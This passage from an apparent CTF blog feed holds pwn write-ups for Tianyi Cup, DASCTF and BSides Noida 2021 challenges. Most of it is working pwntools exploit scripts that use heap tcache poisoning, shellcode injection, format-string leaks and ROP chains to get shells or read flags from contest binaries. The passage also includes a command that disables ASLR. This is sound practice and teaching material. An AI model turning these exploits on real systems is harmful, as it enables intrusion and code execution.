class="line"> sa(<span class="string">'content?'</span>,content)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">idx,size,content</span>):</span></span><br><span class="line"> cmd(<span class="number">3</span>)</span><br><span class="line"> sla(<span class="string">'idx?'</span>,<span class="built_in">str</span>(idx))</span><br><span class="line"> sla(<span class="string">'size?'</span>,<span class="built_in">str</span>(size))</span><br><span class="line"> sa(<span class="string">'content?'</span>,content)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span 
class="title">show</span>(<span class="params">idx</span>):</span></span><br><span class="line"> cmd(<span class="number">4</span>)</span><br><span class="line"> sla(<span class="string">'idx?'</span>,<span class="built_in">str</span>(idx))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">dele</span>(<span class="params">idx</span>):</span></span><br><span class="line"> cmd(<span class="number">2</span>)</span><br><span class="line"> sla(<span class="string">'idx?'</span>,<span class="built_in">str</span>(idx))</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">9</span>): <span class="comment">#0-8</span></span><br><span class="line"> add(i,<span class="number">0x100</span>,<span class="string">'a\n'</span>)</span><br><span class="line">add(<span class="number">9</span>,<span class="number">0x10</span>,<span class="string">'a\n'</span>)</span><br><span class="line">add(<span class="number">10</span>,<span class="number">0x10</span>,<span class="string">'a\n'</span>)</span><br><span class="line">add(<span class="number">11</span>,<span class="number">0x10</span>,<span class="string">'a\n'</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">8</span>):</span><br><span class="line"> dele(i)</span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x40</span>,<span class="string">'\n'</span>)</span><br><span class="line">show(<span class="number">0</span>)</span><br><span class="line">libc.address = u64(ru(<span class="string">'\x7f'</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">'\x00'</span>)) - <span class="number">0x3ebd0a</span></span><br><span class="line">leak(<span 
class="string">'libc.address'</span>,libc.address)</span><br><span class="line"></span><br><span class="line">dele(<span class="number">11</span>)</span><br><span class="line">dele(<span class="number">10</span>)</span><br><span class="line">cmd(<span class="number">1</span>)</span><br><span class="line">sla(<span class="string">'idx?'</span>,<span class="built_in">str</span>(<span class="number">9</span>)) <span class="comment">#<=15</span></span><br><span class="line">sla(<span class="string">'size?'</span>,<span class="built_in">str</span>(-<span class="number">1</span>)) <span class="comment">#<=0x400</span></span><br><span class="line">edit(<span class="number">9</span>,<span class="number">0x300</span>,p64(<span class="number">0</span>)*<span class="number">3</span>+p64(<span class="number">0x21</span>)+p64(libc.sym[<span class="string">'__free_hook'</span>])+<span class="string">'\n'</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">10</span>,<span class="number">0x10</span>,<span class="string">'/bin/sh\x00\n'</span>)</span><br><span class="line">add(<span class="number">11</span>,<span class="number">0x10</span>,p64(libc.sym[<span class="string">'system'</span>])+<span class="string">'\n'</span>)</span><br><span class="line"></span><br><span class="line">dele(<span class="number">10</span>)</span><br><span class="line"><span class="comment"># gdb.attach(sh)</span></span><br><span class="line">ti()</span><br></pre></td></tr></table></figure><h1 id="天翼杯"><a href="#天翼杯" class="headerlink" title="Tianyi Cup"></a>Tianyi Cup</h1><h2 id="overheap"><a href="#overheap" class="headerlink" title="overheap"></a>overheap</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$</span>./libc.so.<span class="number">6</span> 
</span><br><span class="line">GNU C Library (Ubuntu GLIBC <span class="number">2.34</span><span class="literal">-0ubuntu1</span>) stable release version <span class="number">2.34</span>.</span><br><span class="line"></span><br><span class="line">sudo sh <span class="literal">-c</span> <span class="string">"echo 0 > /proc/sys/kernel/randomize_va_space"</span></span><br></pre></td></tr></table></figure><p>To satisfy the alignment requirement, one digit has to be brute-forced.</p>]]></content>
<summary type="html"><blockquote>
<p>I've been slacking off the whole holiday; the problems in the last few contests were all fairly routine, so I'm using them to review my heap and stack exploitation techniques.</p>
</blockquote></summary>
<category term="pwn" scheme="https://brooke-hub.github.io/tags/pwn/"/>
</entry>
<entry>
<title>BUU Monthly Contest</title>
<link href="https://brooke-hub.github.io/2021/09/26/BUU%E6%9C%88%E8%B5%9B/"/>
<id>https://brooke-hub.github.io/2021/09/26/BUU%E6%9C%88%E8%B5%9B/</id>
<published>2021-09-26T02:28:57.000Z</published>
<updated>2021-09-26T02:40:51.698Z</updated>
<content type="html"><![CDATA[<blockquote><p>I'll try to take part in every monthly contest from now on!</p></blockquote><span id="more"></span><h1 id="DASCTF-Sept-X-浙江工业大学秋季挑战赛"><a href="#DASCTF-Sept-X-浙江工业大学秋季挑战赛" class="headerlink" title="DASCTF Sept X Zhejiang University of Technology Autumn Challenge"></a>DASCTF Sept X Zhejiang University of Technology Autumn Challenge</h1><p><img src="/2021/09/26/BUU%E6%9C%88%E8%B5%9B/image-20210926103720313.png" alt="image-20210926103720313"></p><h2 id="hehepwn"><a href="#hehepwn" class="headerlink" title="hehepwn"></a>hehepwn</h2><p>The stack-overflow payload gets truncated at '\x00', so only the return address is overwritten.</p><p>Leak a stack address, then use the stack overflow to jump to shellcode placed on the stack.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: UTF-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span 
class="line"><span class="keyword">import</span> sys</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">context.arch=<span class="string">'amd64'</span></span><br><span class="line"></span><br><span class="line">flag=<span class="number">1</span></span><br><span class="line"><span class="keyword">if</span> flag:</span><br><span class="line"> sh = remote(<span class="string">'node4.buuoj.cn'</span>, <span class="number">28964</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line"> sh = process(<span class="string">"./bypwn"</span>)</span><br><span class="line"></span><br><span class="line">libc=ELF(<span class="string">'/home/wendy/Desktop/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6'</span>,checksec=<span class="literal">False</span>)</span><br><span class="line">elf=ELF(<span class="string">'./bypwn'</span>)</span><br><span class="line">sa = <span class="keyword">lambda</span> s,n : sh.sendafter(s,n)</span><br><span class="line">sla = <span class="keyword">lambda</span> s,n : sh.sendlineafter(s,n)</span><br><span class="line">sl = <span class="keyword">lambda</span> s : sh.sendline(s)</span><br><span class="line">sd = <span class="keyword">lambda</span> s : sh.send(s)</span><br><span class="line">rc = <span class="keyword">lambda</span> n : sh.recv(n)</span><br><span class="line">ru = <span class="keyword">lambda</span> s : sh.recvuntil(s)</span><br><span class="line">ti = <span class="keyword">lambda</span> : sh.interactive()</span><br><span class="line">leak = <span class="keyword">lambda</span> name,addr :log.success(name+<span class="string">":"</span>+<span class="built_in">hex</span>(addr))</span><br><span class="line"></span><br><span class="line">pause()</span><br><span class="line">sla(<span class="string">'input:'</span>,<span class="string">'a'</span>*<span class="number">0x20</span>)</span><br><span class="line">stack_addr = 
u64(sh.recvuntil(<span class="string">'\x7f'</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">'\x00'</span>))</span><br><span class="line">leak(<span class="string">'stack_addr'</span>,stack_addr)</span><br><span class="line"></span><br><span class="line">pause()</span><br><span class="line"></span><br><span class="line">shellcode=asm(shellcraft.sh())</span><br><span class="line">pay=shellcode.ljust(<span class="number">0x58</span>,<span class="string">'b'</span>)</span><br><span class="line">pay+=p64(stack_addr-<span class="number">0x50</span>)</span><br><span class="line"></span><br><span class="line">sla(<span class="string">'EASY PWN PWN PWN~'</span>,pay)</span><br><span class="line"><span class="comment"># gdb.attach(sh)</span></span><br><span class="line">ti()</span><br></pre></td></tr></table></figure><h2 id="hahapwn"><a href="#hahapwn" class="headerlink" title="hahapwn"></a>hahapwn</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span 
class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: UTF-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">context.arch=<span class="string">'amd64'</span></span><br><span class="line"></span><br><span class="line">flag=<span class="number">1</span></span><br><span class="line"><span class="keyword">if</span> flag:</span><br><span class="line"> sh = remote(<span class="string">'node4.buuoj.cn'</span>, <span class="number">29107</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line"> sh = process(<span class="string">"./pwn"</span>)</span><br><span class="line"></span><br><span class="line"><span 
class="comment"># libc=ELF('libc.so.6')</span></span><br><span class="line">libc=ELF(<span class="string">'/home/wendy/Desktop/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6'</span>,checksec=<span class="literal">False</span>)</span><br><span class="line">elf=ELF(<span class="string">'./pwn'</span>)</span><br><span class="line">sa = <span class="keyword">lambda</span> s,n : sh.sendafter(s,n)</span><br><span class="line">sla = <span class="keyword">lambda</span> s,n : sh.sendlineafter(s,n)</span><br><span class="line">sl = <span class="keyword">lambda</span> s : sh.sendline(s)</span><br><span class="line">sd = <span class="keyword">lambda</span> s : sh.send(s)</span><br><span class="line">rc = <span class="keyword">lambda</span> n : sh.recv(n)</span><br><span class="line">ru = <span class="keyword">lambda</span> s : sh.recvuntil(s)</span><br><span class="line">ti = <span class="keyword">lambda</span> : sh.interactive()</span><br><span class="line">leak = <span class="keyword">lambda</span> name,addr :log.success(name+<span class="string">":"</span>+<span class="built_in">hex</span>(addr))</span><br><span class="line"></span><br><span class="line">pay=<span class="string">'%25$p.%27$p.%28$p'</span></span><br><span class="line">pay=pay.ljust(<span class="number">0x20</span>,<span class="string">'\x00'</span>)</span><br><span class="line">pay+=<span class="string">'flag\x00\x00\x00\x00'</span></span><br><span class="line">sla(<span class="string">'What is your name?'</span>,pay)</span><br><span class="line"><span class="comment"># 0x6ffc4</span></span><br><span class="line">ru(<span class="string">'0x'</span>)</span><br><span class="line">libc_base = <span class="built_in">int</span>(sh.recvuntil(<span class="string">'.'</span>,drop=<span class="literal">True</span>),<span class="number">16</span>) - <span class="number">0x6ffc4</span></span><br><span class="line">leak(<span class="string">'libc_base'</span>,libc_base)</span><br><span 
class="line">libc.address=libc_base</span><br><span class="line">ru(<span class="string">'0x'</span>)</span><br><span class="line">canary = <span class="built_in">int</span>(sh.recvuntil(<span class="string">'.'</span>,drop=<span class="literal">True</span>),<span class="number">16</span>)</span><br><span class="line">leak(<span class="string">'canary'</span>,canary)</span><br><span class="line"><span class="comment"># 0xe0</span></span><br><span class="line">ru(<span class="string">'0x'</span>)</span><br><span class="line">stack_addr = <span class="built_in">int</span>(sh.recvuntil(<span class="string">'\n'</span>,drop=<span class="literal">True</span>),<span class="number">16</span>)</span><br><span class="line">flag=stack_addr -<span class="number">0xe0</span></span><br><span class="line">leak(<span class="string">'flag'</span>,flag)</span><br><span class="line"></span><br><span class="line">pop_rdi=<span class="number">0x0000000000400943</span></span><br><span class="line">pop_rsi=<span class="number">0x00000000000202f8</span>+libc_base</span><br><span class="line">pop_rdx=<span class="number">0x0000000000001b92</span>+libc_base</span><br><span class="line"></span><br><span class="line">orw_rop=<span class="string">'a'</span>*(<span class="number">0x70</span>-<span class="number">8</span>)+p64(canary)+p64(<span class="number">0</span>)</span><br><span class="line">orw_rop+=p64(pop_rdi)+p64(flag)</span><br><span class="line">orw_rop+=p64(pop_rsi)+p64(<span class="number">0</span>)</span><br><span class="line">orw_rop+=p64(libc.sym[<span class="string">'open'</span>])</span><br><span class="line">orw_rop+=p64(pop_rdi)+p64(<span class="number">3</span>)</span><br><span class="line">orw_rop+=p64(pop_rsi)+p64(flag)</span><br><span class="line">orw_rop+=p64(pop_rdx)+p64(<span class="number">0x50</span>)</span><br><span class="line">orw_rop+=p64(libc.sym[<span class="string">'read'</span>])</span><br><span class="line">orw_rop+=p64(pop_rdi)+p64(<span 
class="number">1</span>)</span><br><span class="line">orw_rop+=p64(pop_rsi)+p64(flag)</span><br><span class="line">orw_rop+=p64(pop_rdx)+p64(<span class="number">0x50</span>)</span><br><span class="line">orw_rop+=p64(libc.sym[<span class="string">'write'</span>])</span><br><span class="line"></span><br><span class="line"><span class="comment"># pause()</span></span><br><span class="line">sla(<span class="string">'What can we help you?'</span>,orw_rop)</span><br><span class="line"><span class="comment"># gdb.attach(sh)</span></span><br><span class="line">ti()</span><br></pre></td></tr></table></figure><h2 id="datasystem"><a href="#datasystem" class="headerlink" title="datasystem"></a>datasystem</h2>]]></content>
<summary type="html"><blockquote>
<p>I'll try to take part in every monthly contest from now on!</p>
</blockquote></summary>
<category term="pwn" scheme="https://brooke-hub.github.io/tags/pwn/"/>
</entry>
<entry>
<title>BSides-Noida-CTF-master_2021_pwn_reproduction</title>
<link href="https://brooke-hub.github.io/2021/09/23/BSides-Noida-CTF-master-2021-pwn-%E5%A4%8D%E7%8E%B0/"/>
<id>https://brooke-hub.github.io/2021/09/23/BSides-Noida-CTF-master-2021-pwn-%E5%A4%8D%E7%8E%B0/</id>
<published>2021-09-23T01:15:09.000Z</published>
<updated>2021-09-23T09:17:05.960Z</updated>
<content type="html"><![CDATA[<p>There is also a musl UAF problem and a kernel ROP problem.</p><p>I'll add them later (if I remember).</p><span id="more"></span><h1 id="teen-sum"><a href="#teen-sum" class="headerlink" title="teen-sum"></a>teen-sum</h1><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash">checksec teen-sum</span></span><br><span class="line">[*] '/home/wendy/Desktop/BSides-Noida-CTF-master/Pwn/teen-sum/teen-sum'</span><br><span class="line"> Arch: amd64-64-little</span><br><span class="line"> RELRO: Full RELRO</span><br><span class="line"> Stack: No canary found</span><br><span class="line"> NX: NX enabled</span><br><span class="line"> PIE: PIE enabled</span><br><span class="line"> RUNPATH: '.'</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>There are two chances to input name: the first leaks stack contents to obtain libc.</p><p>The second is a stack overflow; note that name_sz has to be overwritten with a number, and on glibc versions above 2.23 a stack overflow needs an extra ret gadget to fix stack alignment.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span 
class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: UTF-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">context.arch=<span class="string">'amd64'</span></span><br><span class="line">binary=<span class="string">'./teen-sum'</span></span><br><span class="line">elf=ELF(binary)</span><br><span class="line">libc = ELF(<span class="string">'/home/wendy/Desktop/glibc-all-in-one/libs/2.31-0ubuntu9.2_amd64/libc.so.6'</span>)</span><br><span class="line">flag=<span class="number">0</span></span><br><span class="line"><span class="keyword">if</span> flag:</span><br><span class="line"> sh = remote(<span class="string">'39.96.88.40'</span>, <span class="number">7020</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line"> sh = process(binary)</span><br><span class="line">sa = <span class="keyword">lambda</span> s,n : sh.sendafter(s,n)</span><br><span class="line">sla = <span class="keyword">lambda</span> s,n : sh.sendlineafter(s,n)</span><br><span class="line">sl = <span 
class="keyword">lambda</span> s : sh.sendline(s)</span><br><span class="line">sd = <span class="keyword">lambda</span> s : sh.send(s)</span><br><span class="line">rc = <span class="keyword">lambda</span> n : sh.recv(n)</span><br><span class="line">ru = <span class="keyword">lambda</span> s : sh.recvuntil(s)</span><br><span class="line">ti = <span class="keyword">lambda</span> : sh.interactive()</span><br><span class="line">leak = <span class="keyword">lambda</span> name,addr :log.success(name+<span class="string">':'</span>+<span class="built_in">hex</span>(addr))</span><br><span class="line"></span><br><span class="line"><span class="comment"># 0x227e0a</span></span><br><span class="line"><span class="comment"># 0x48</span></span><br><span class="line"></span><br><span class="line">sla(<span class="string">'> '</span>,<span class="built_in">str</span>(<span class="number">0x10</span>))</span><br><span class="line">sla(<span class="string">'> '</span>,<span class="string">''</span>)</span><br><span class="line">libc_base = u64(ru(<span class="string">'\x7f'</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">'\x00'</span>)) - <span class="number">0x223e0a</span></span><br><span class="line">leak(<span class="string">'libc_base'</span>,libc_base)</span><br><span class="line">binsh=libc_base+<span class="built_in">next</span>(libc.search(<span class="string">b'/bin/sh'</span>))</span><br><span class="line">pop_rdi = libc_base+<span class="number">0x0000000000026b72</span></span><br><span class="line">system = libc_base+libc.sym[<span class="string">'system'</span>]</span><br><span class="line">ret = libc_base+<span class="number">0x0000000000025679</span></span><br><span class="line"></span><br><span class="line">sla(<span class="string">'> '</span>,<span class="string">'1'</span>)</span><br><span class="line">sla(<span class="string">'> '</span>,<span class="string">'1'</span>)</span><br><span class="line">sla(<span 
class="string">'> '</span>,<span class="string">'1'</span>)</span><br><span class="line">pause()</span><br><span class="line">sla(<span class="string">'New size please.> '</span>,<span class="built_in">str</span>(<span class="number">0x100</span>))</span><br><span class="line">pause()</span><br><span class="line">sla(<span class="string">'> '</span>,<span class="string">'a'</span>*<span class="number">0x38</span>+p64(<span class="number">0</span>)+<span class="string">'a'</span>*<span class="number">8</span>+p64(ret)+p64(pop_rdi)+p64(binsh)+p64(system))</span><br><span class="line"><span class="comment"># gdb.attach(sh)</span></span><br><span class="line">ti()</span><br></pre></td></tr></table></figure><h1 id="warmup"><a href="#warmup" class="headerlink" title="warmup"></a>warmup</h1><p>malloc does not clear the chunk, so libc can be leaked; the write places a 0 at offset size-1, which truncates the puts output, but with size 0 the leak is unaffected.</p><p>Then there is one UAF opportunity: attack tcache, noting that version 2.32 adds an extra key check.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span 
class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: UTF-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line">context.log_level=<span 
class="string">'debug'</span></span><br><span class="line">context.arch=<span class="string">'amd64'</span></span><br><span class="line"></span><br><span class="line">binary = <span class="string">'./warmup'</span></span><br><span class="line">elf=ELF(binary)</span><br><span class="line">libc = ELF(<span class="string">'/home/wendy/Desktop/glibc-all-in-one/libs/2.32-0ubuntu3_amd64/libc.so.6'</span>)</span><br><span class="line">flag=<span class="number">0</span></span><br><span class="line"><span class="keyword">if</span> flag:</span><br><span class="line"> sh = remote(<span class="string">'47.104.70.90'</span>, <span class="number">25315</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line"> sh = process(binary)</span><br><span class="line"></span><br><span class="line">sa = <span class="keyword">lambda</span> s,n : sh.sendafter(s,n)</span><br><span class="line">sla = <span class="keyword">lambda</span> s,n : sh.sendlineafter(s,n)</span><br><span class="line">sl = <span class="keyword">lambda</span> s : sh.sendline(s)</span><br><span class="line">sd = <span class="keyword">lambda</span> s : sh.send(s)</span><br><span class="line">rc = <span class="keyword">lambda</span> n : sh.recv(n)</span><br><span class="line">ru = <span class="keyword">lambda</span> s : sh.recvuntil(s)</span><br><span class="line">ti = <span class="keyword">lambda</span> : sh.interactive()</span><br><span class="line">leak = <span class="keyword">lambda</span> name,addr :log.success(name+<span class="string">":"</span>+<span class="built_in">hex</span>(addr))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">leaklibc</span>():</span></span><br><span class="line"> <span class="keyword">global</span> libc_base,__malloc_hook,__free_hook,system,binsh_addr,_IO_2_1_stdout_,_IO_list_all,realloc</span><br><span class="line"> libc_base = u64(sh.recvuntil(<span class="string">'\x7f'</span>)[-<span 
class="number">6</span>:].ljust(<span class="number">8</span>, <span class="string">'\x00'</span>)) - <span class="number">0x1e4030</span></span><br><span class="line"> success(<span class="string">'libc_base = '</span>+<span class="built_in">hex</span>(libc_base))</span><br><span class="line"> __malloc_hook=libc_base+libc.sym[<span class="string">'__malloc_hook'</span>]</span><br><span class="line"> __free_hook=libc_base+libc.sym[<span class="string">'__free_hook'</span>]</span><br><span class="line"> system=libc_base+libc.sym[<span class="string">'system'</span>]</span><br><span class="line"> realloc=libc_base+libc.sym[<span class="string">'realloc'</span>]</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">cmd</span>(<span class="params">index</span>):</span></span><br><span class="line"> sla(<span class="string">'> '</span>, <span class="built_in">str</span>(index))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">index,sz,data</span>):</span></span><br><span class="line"> cmd(<span class="number">1</span>)</span><br><span class="line"> sla(<span class="string">'idx: '</span>,<span class="built_in">str</span>(index)) <span class="comment">#0-15</span></span><br><span class="line"> sla(<span class="string">'sz: '</span>,<span class="built_in">str</span>(sz)) <span class="comment">#<=0x1000</span></span><br><span class="line"> sa(<span class="string">'data: '</span>,data)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,data</span>):</span></span><br><span class="line"> cmd(<span class="number">3</span>)</span><br><span class="line"> sla(<span class="string">'idx: '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"> sa(<span class="string">'data: '</span>,data)</span><br><span class="line"><span 
class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">index</span>):</span></span><br><span class="line"> cmd(<span class="number">2</span>)</span><br><span class="line"> sla(<span class="string">'idx: '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">dele</span>(<span class="params">index</span>):</span></span><br><span class="line"> cmd(<span class="number">4</span>)</span><br><span class="line"> sla(<span class="string">'idx: '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">save</span>(<span class="params">index</span>):</span></span><br><span class="line"> cmd(<span class="number">5</span>)</span><br><span class="line"> sla(<span class="string">'idx: '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x10</span>,<span class="string">'a'</span>)</span><br><span class="line">add(<span class="number">1</span>,<span class="number">0x500</span>,<span class="string">'b'</span>)</span><br><span class="line">add(<span class="number">2</span>,<span class="number">0x20</span>,<span class="string">'a'</span>)</span><br><span class="line">add(<span class="number">3</span>,<span class="number">0x20</span>,<span class="string">'a'</span>)</span><br><span class="line">add(<span class="number">4</span>,<span class="number">0x20</span>,<span class="string">'a'</span>)</span><br><span class="line"></span><br><span class="line">dele(<span class="number">0</span>)</span><br><span class="line">dele(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0</span>,<span 
class="string">''</span>)</span><br><span class="line">show(<span class="number">0</span>)</span><br><span class="line">ru(<span class="string">'data: '</span>)</span><br><span class="line">key = u64(rc(<span class="number">5</span>).ljust(<span class="number">8</span>,<span class="string">'\x00'</span>))</span><br><span class="line">leak(<span class="string">'key'</span>,key)</span><br><span class="line"></span><br><span class="line">add(<span class="number">1</span>,<span class="number">0</span>,<span class="string">''</span>)</span><br><span class="line">show(<span class="number">1</span>)</span><br><span class="line">leaklibc()</span><br><span class="line"></span><br><span class="line">dele(<span class="number">3</span>)</span><br><span class="line">save(<span class="number">4</span>)</span><br><span class="line">dele(<span class="number">4</span>)</span><br><span class="line"></span><br><span class="line">edit(<span class="number">4</span>,p64(__free_hook^key) + p64((key<<<span class="number">12</span>) + <span class="number">0x10</span>) + <span class="string">'\n'</span>)</span><br><span class="line">add(<span class="number">5</span>,<span class="number">0x20</span>,<span class="string">'/bin/sh\x00\n'</span>)</span><br><span class="line">add(<span class="number">6</span>,<span class="number">0x20</span>,p64(system)+<span class="string">'\n'</span>)</span><br><span class="line">dele(<span class="number">5</span>)</span><br><span class="line"><span class="comment"># gdb.attach(sh)</span></span><br><span class="line">ti()</span><br><span class="line"></span><br></pre></td></tr></table></figure>]]></content>
<summary type="html"><p>There is also one musl UAF and one kernel ROP challenge.</p>
<p>I will add them later (if I remember).</p></summary>
<category term="pwn" scheme="https://brooke-hub.github.io/tags/pwn/"/>
</entry>
<entry>
<title>RCTF_2021_pwn reproduction</title>
<link href="https://brooke-hub.github.io/2021/09/22/RCTF-2021-pwn%E5%A4%8D%E7%8E%B0/"/>
<id>https://brooke-hub.github.io/2021/09/22/RCTF-2021-pwn%E5%A4%8D%E7%8E%B0/</id>
<published>2021-09-22T08:40:01.000Z</published>
